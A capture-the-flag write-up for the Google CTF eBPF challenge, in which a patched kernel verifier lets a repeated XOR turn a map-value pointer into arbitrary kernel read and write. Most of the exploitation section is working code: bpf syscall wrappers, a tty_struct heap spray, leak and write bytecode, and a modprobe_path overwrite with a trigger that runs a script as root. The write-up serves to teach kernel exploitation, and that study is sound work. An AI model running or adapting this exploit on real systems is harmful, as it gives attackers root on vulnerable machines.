Last weekend we played Google CTF and I solved 2 challenges: the first 2 parts of fullchain and eBPF. The fullchain challenge is actually quite easy: the v8 bug and the mojo bug are just basic OOB access bugs. However, eBPF was quite interesting for me, since it was my first time learning about and exploiting the eBPF module in the Linux kernel, so it is worth writing up.

0x00 Overview

In this challenge, instead of a .ko kernel module as in a normal kernel exploit challenge, we are only provided with a patched Linux kernel. In the patch, the eBPF verifier.c is modified so that the xor operation is allowed on a pointer to a map value. The problem is that by applying xor to such a pointer twice with different operands, we can make the pointer point to an arbitrary address, which gives us arbitrary read and write primitives. We can then use these to leak a kernel address by spraying and reading tty_struct, and to rewrite modprobe_path to get root privileges.

0x01 Introduction to eBPF

There are many useful resources about eBPF online; the ones that were most useful for me in solving this challenge are this introduction to the low-level details of eBPF and this exploit of an eBPF CVE. In short, eBPF is a virtual machine that runs in the Linux kernel. A user program can provide bytecode to the kernel, and the kernel checks whether the bytecode is safe and valid before loading it; if the check passes, the kernel loads the bytecode and runs it on certain events. Note that the check is done before the bytecode is run, not while it is running. Therefore, if the check is wrong in some way and allows insecure bytecode to be loaded and run, the kernel can be compromised. This is exactly what this challenge is about.

eBPF Environment

Configuring a development environment for eBPF in C took me quite a long time, because the provided sock_example could not be compiled successfully on my computer. In the end, the CVE exploit mentioned above solved this problem for me: I can implement the eBPF API by calling the syscall directly. Thus the only required header file is bpf_insn.h, which can easily be downloaded from the Linux repository.
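To give an idea, here is a minimal sketch of such syscall-based wrappers (the helper names bpf_create_map and bpf_prog_load are my own, not the libbpf API; the actual exploit may differ in details):

#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/bpf.h>

static long bpf_syscall(int cmd, union bpf_attr *attr)
{
	return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

/* create a map and return its fd */
static int bpf_create_map(enum bpf_map_type type, uint32_t key_size,
			  uint32_t value_size, uint32_t max_entries)
{
	union bpf_attr attr;
	memset(&attr, 0, sizeof(attr));
	attr.map_type = type;
	attr.key_size = key_size;
	attr.value_size = value_size;
	attr.max_entries = max_entries;
	return bpf_syscall(BPF_MAP_CREATE, &attr);
}

/* load a program and return its fd; the verifier log goes to `log` */
static int bpf_prog_load(enum bpf_prog_type type,
			 const struct bpf_insn *insns, uint32_t insn_cnt,
			 char *log, uint32_t log_size)
{
	union bpf_attr attr;
	memset(&attr, 0, sizeof(attr));
	attr.prog_type = type;
	attr.insns = (uint64_t)insns;
	attr.insn_cnt = insn_cnt;
	attr.license = (uint64_t)"GPL";
	attr.log_buf = (uint64_t)log;
	attr.log_size = log_size;
	attr.log_level = log ? 1 : 0;
	return bpf_syscall(BPF_PROG_LOAD, &attr);
}

Reading the verifier log is very helpful for figuring out why a program gets rejected.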

There is another problem: we cannot compile the exploit using musl-gcc, which produces a small binary. It seems that musl-gcc cannot find the <linux/xxx.h> header files. I solved this by preprocessing the exploit with gcc -E and compiling the preprocessed output with musl-gcc:

gcc -E exp.c -o fs/exp.c
musl-gcc -static fs/exp.c -o fs/exp

This is a quite useful trick whenever musl-gcc cannot compile an exploit that gcc can.

0x02 Vulnerability

The first patch adds a bool auth_map field to struct bpf_reg_state, the structure used to represent the state of a register during bytecode verification. The second patch allows the BPF_XOR operation on a register of PTR_TO_MAP_VALUE type in function adjust_ptr_min_max_vals:

case BPF_XOR:
    // As long as we downgrade the result to scalar it is safe.
    if (dst_reg->type == PTR_TO_MAP_VALUE) {
        dst_reg->type = SCALAR_VALUE;
        dst_reg->auth_map = true;
        break;
    }

When BPF_XOR is applied to a scalar register that was converted from PTR_TO_MAP_VALUE by a previous BPF_XOR, its type is set back to PTR_TO_MAP_VALUE:

// in function adjust_scalar_min_max_vals
case BPF_XOR:
    /* Restore the pointer type.*/
    if (dst_reg->auth_map) {
        dst_reg->auth_map = false;
        dst_reg->type = PTR_TO_MAP_VALUE;
        break;
    }

The problem is obvious: if we apply BPF_XOR to a PTR_TO_MAP_VALUE register, it is converted to SCALAR_VALUE and auth_map is set to true; if we then apply BPF_XOR to that register again, the type is set back to PTR_TO_MAP_VALUE because auth_map == true. However, the operand values of the 2 BPF_XOR operations can be different, so we can set the register to an arbitrary address while it keeps the PTR_TO_MAP_VALUE type. This eventually leads to arbitrary memory read and write primitives.
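In bytecode form, the primitive looks roughly like the sketch below (DELTA is a placeholder offset; the full programs in the next section do the same thing with concrete values). Assume r0 already holds a verified PTR_TO_MAP_VALUE:

BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),          // r1 = map ptr (PTR_TO_MAP_VALUE)
BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),          // r2 = map ptr
BPF_ALU64_IMM(BPF_XOR, BPF_REG_1, 0),         // 1st xor: r1 becomes SCALAR, auth_map = true
BPF_ALU64_IMM(BPF_XOR, BPF_REG_2, 0),         // r2 becomes SCALAR as well
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, DELTA),     // scalar arithmetic, no bounds check
BPF_ALU64_REG(BPF_XOR, BPF_REG_0, BPF_REG_2), // r0 = ptr ^ (ptr + DELTA), now SCALAR
BPF_ALU64_REG(BPF_XOR, BPF_REG_1, BPF_REG_0), // 2nd xor: r1 restored to PTR_TO_MAP_VALUE,
                                              //          but holds ptr + DELTA at runtime

Any load or store through r1 is now an out-of-bounds access that the verifier still believes to be inside the map value.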

0x03 Exploitation

Get PTR_TO_MAP_VALUE Register

This actually took me quite a long time. I originally thought that the value returned by BPF_LD_MAP_FD was a PTR_TO_MAP_VALUE, but it is actually not. Finally, by reading the source code and searching for references to RET_PTR_TO_MAP_VALUE_OR_NULL, I found that the return type of BPF_FUNC_map_lookup_elem is RET_PTR_TO_MAP_VALUE_OR_NULL, and by checking it against NULL we can get a PTR_TO_MAP_VALUE register. This is also exactly what the provided example shows.

Therefore, we can apply the BPF_XOR operation to that register, and it turns out that the verification check passes, which means the vulnerability has been triggered. We can leak the address of the BPF_MAP_TYPE_ARRAY buffer by writing the result of BPF_XOR back into the buffer and reading the buffer from user space.
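Running the program and reading the buffer back is not specific to this challenge. One common way to do it (a sketch; the actual exploit may differ in details) is to load the program as a BPF_PROG_TYPE_SOCKET_FILTER, attach it to one end of a socketpair, write a byte to the other end to trigger one execution, and then fetch the map element with BPF_MAP_LOOKUP_ELEM from user space:

#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <linux/bpf.h>

#ifndef SO_ATTACH_BPF
#define SO_ATTACH_BPF 50
#endif

/* copy value_size bytes of map element `key` into `value` from user space */
static int read_map_elem(int mapfd, uint32_t key, void *value)
{
	union bpf_attr attr;
	memset(&attr, 0, sizeof(attr));
	attr.map_fd = mapfd;
	attr.key = (uint64_t)&key;
	attr.value = (uint64_t)value;
	return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

/* attach a loaded socket-filter program and run it once */
static void trigger_prog(int progfd)
{
	int socks[2];
	char byte = 0;
	socketpair(AF_UNIX, SOCK_DGRAM, 0, socks);
	setsockopt(socks[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd));
	write(socks[0], &byte, 1); /* each packet runs the filter once */
}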

Leaking Kernel Address

After some investigation, I found that the BPF_MAP_TYPE_ARRAY buffer is probably stored on the heap. Therefore, the idea is to spray tty_struct, which contains a kernel address at offset +0x18, and read that field to get a kernel address. However, after some trials, I found that it is hard to allocate a tty_struct adjacent to the BPF_MAP_TYPE_ARRAY buffer; nonetheless, although the tty_struct ends up quite far from the BPF_MAP_TYPE_ARRAY buffer, the offset from the buffer to the tty_struct is fairly constant: 0x21ef0. Therefore, we can simply add this constant offset to the buffer address and read the +0x18 field to leak a kernel address. However, this is not 100% stable and needs some brute-force for the assumption to hold.
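The spray itself is straightforward: every open of /dev/ptmx allocates a tty_struct on the kernel heap. A minimal sketch (the spray count here is an arbitrary choice):

#include <fcntl.h>
#include <stdio.h>

#define SPRAY_CNT 0x100 /* arbitrary; enough in practice for this setup */

static int tty_fds[SPRAY_CNT];

/* each open of /dev/ptmx allocates a tty_struct; keep the fds open so the
 * objects stay alive while the bytecode reads the kernel pointer at +0x18 */
static void spray_tty(void)
{
	for (int i = 0; i < SPRAY_CNT; i++) {
		tty_fds[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);
		if (tty_fds[i] < 0)
			perror("open /dev/ptmx");
	}
}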

The bytecode for leaking is shown below:

struct bpf_insn insns[]={
	BPF_MOV64_IMM(BPF_REG_0, 0),
	BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), /* *(u32 *)(fp - 4) = r0 */
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */
	BPF_LD_MAP_FD(BPF_REG_1, EXP_MAP_FD),
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 11+1),

	BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
	BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
	BPF_ALU64_IMM(BPF_XOR, BPF_REG_2, 0), // convert r2, r1 to scalar
	BPF_ALU64_IMM(BPF_XOR, BPF_REG_1, 0),
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0x21ef0+0x18),
	BPF_ALU64_REG(BPF_XOR, BPF_REG_0, BPF_REG_2), // r0 = dst ^ src
	BPF_ALU64_REG(BPF_XOR, BPF_REG_1, BPF_REG_0), // r1 = src ^ dst ^ src = dst
	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_1, 0), // r2 = [dst] = kernel pointer read from tty_struct+0x18
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0x451200), // r2 = &modprobe
	BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_2, 0), // store and leak modprobe

	BPF_JMP_IMM(BPF_JMP, BPF_REG_0, 0, 1),
	BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 */
	BPF_EXIT_INSN(),
};

There are also some points to note:

  1. We need to add some constant to the register containing the buffer address, but we cannot later use that register directly to load from memory; the verifier seems to be able to detect the out-of-bounds access if we do so. Therefore we need the xor trick to indirectly make a PTR_TO_MAP_VALUE register point to the tty_struct.
  2. One weird thing is that even if we don't use BPF_XOR, we can still somewhat leak the address of the buffer; I am not sure why this happens.
  3. You may ask why I only leak the kernel address in this step, instead of performing the whole exploitation and rewriting modprobe_path with the arbitrary write. The problem is that if the operand register of BPF_XOR originates from a load through a PTR_TO_MAP_VALUE register, the second BPF_XOR cannot convert the register back to PTR_TO_MAP_VALUE type. My guess is that, since the patch is added to adjust_scalar_min_max_vals, which according to its name analyzes the range of a scalar, and the verifier cannot decide the range of a value loaded from BPF_MAP_TYPE_ARRAY memory, this function is possibly never called, so the patch that converts the scalar back to PTR_TO_MAP_VALUE is not triggered.
  4. It seems that sometimes, if we apply BPF_XOR to a register more than 2 times, the kernel crashes when loading the bytecode; I am not sure why this happens either.

Rewriting modprobe_path

Then we exploit the bug again to rewrite modprobe_path and read the flag. This time, instead of loading the address of modprobe_path from memory, we supply it directly as a constant, so the problem from the last step does not exist. Then we can use the xor trick again to obtain a PTR_TO_MAP_VALUE register pointing to &modprobe_path, so that a store through that register rewrites modprobe_path.

The bytecode is shown below:

struct bpf_insn insns2[]={
	BPF_MOV64_IMM(BPF_REG_0, 0),
	BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), /* *(u32 *)(fp - 4) = r0 */
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */
	BPF_LD_MAP_FD(BPF_REG_1, expmapfd),
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 28+1),

	BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
	BPF_ALU64_IMM(BPF_XOR, BPF_REG_3, 0), // convert r0, r3 to scalar
	BPF_ALU64_IMM(BPF_XOR, BPF_REG_0, 0),
	BPF_MOV64_IMM(BPF_REG_1, 0),
	BPF_MOV64_IMM(BPF_REG_2, (modprobe >> 0x30) & 0xffff),
	BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x30),
	BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),
	BPF_MOV64_IMM(BPF_REG_2, (modprobe >> 0x20) & 0xffff),
	BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x20),
	BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),
	BPF_MOV64_IMM(BPF_REG_2, (modprobe >> 0x10) & 0xffff),
	BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x10),
	BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),
	BPF_MOV64_IMM(BPF_REG_2, (modprobe) & 0xffff),
	BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = &modprobe
	BPF_ALU64_REG(BPF_XOR, BPF_REG_0, BPF_REG_1), // r0 = src ^ &modprobe
	BPF_ALU64_IMM(BPF_XOR, BPF_REG_0, 0), // r0 became PTR_TO_MAP_VALUE again, convert it back to scalar
	BPF_ALU64_REG(BPF_XOR, BPF_REG_3, BPF_REG_0), // r3 = src ^ src ^ &modprobe = &modprobe, restored to PTR_TO_MAP_VALUE
	BPF_MOV64_IMM(BPF_REG_4, 0),
	BPF_MOV64_IMM(BPF_REG_2, (tmp_x >> 0x20) & 0xffff),
	BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x20),
	BPF_ALU64_REG(BPF_OR, BPF_REG_4, BPF_REG_2),
	BPF_MOV64_IMM(BPF_REG_2, (tmp_x >> 0x10) & 0xffff),
	BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x10),
	BPF_ALU64_REG(BPF_OR, BPF_REG_4, BPF_REG_2),
	BPF_MOV64_IMM(BPF_REG_2, (tmp_x) & 0xffff),
	BPF_ALU64_REG(BPF_OR, BPF_REG_4, BPF_REG_2), // r4 = /tmp/x
	BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_4, 0), // rewrite modprobe_path

	BPF_JMP_IMM(BPF_JMP, BPF_REG_0, 0, 1),
	BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 */
	BPF_EXIT_INSN(),
};

There are also 2 points to note:

  1. We have to load the immediate using BPF_LSH and BPF_OR, because BPF_MOV64_IMM only supports a 32-bit signed immediate.
  2. We cannot apply BPF_XOR directly to the PTR_TO_MAP_VALUE register and the register holding &modprobe_path, because this raises an error: the value of &modprobe_path, interpreted as a signed 64-bit integer, is too low and falls below a minimum bound. Instead, we need to convert the register to a scalar first before applying this operation; after the operation the register becomes PTR_TO_MAP_VALUE again, so we need to apply BPF_XOR once more to convert it back to a scalar. Fortunately, applying BPF_XOR 3 times like this does not cause any crash when loading the bytecode.
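After modprobe_path has been overwritten with /tmp/x, we still need to trigger modprobe to actually read the flag: executing a file whose first bytes match no binfmt handler makes the kernel run the modprobe binary (now our /tmp/x script) as root. A sketch is shown below; the flag location /flag is an assumption and may need to be adjusted:

#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

static void get_flag(void)
{
	/* /tmp/x will be executed as root in place of modprobe;
	 * /flag is an assumed path, adjust if needed */
	const char script[] = "#!/bin/sh\ncp /flag /tmp/flag\nchmod 777 /tmp/flag\n";
	int fd;

	fd = open("/tmp/x", O_WRONLY | O_CREAT, 0755);
	write(fd, script, sizeof(script) - 1);
	close(fd);

	/* a file with an unknown magic number: execve fails, but the kernel
	 * first invokes the (overwritten) modprobe path as root */
	fd = open("/tmp/dummy", O_WRONLY | O_CREAT, 0755);
	write(fd, "\xff\xff\xff\xff", 4);
	close(fd);

	system("/tmp/dummy");
	system("cat /tmp/flag");
}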

The full exploit is here.

0x04 Conclusion

This challenge is quite good: I learned a lot about eBPF while solving it. I hope eBPF can also be a good attack surface for real-world Linux kernel vulnerability research.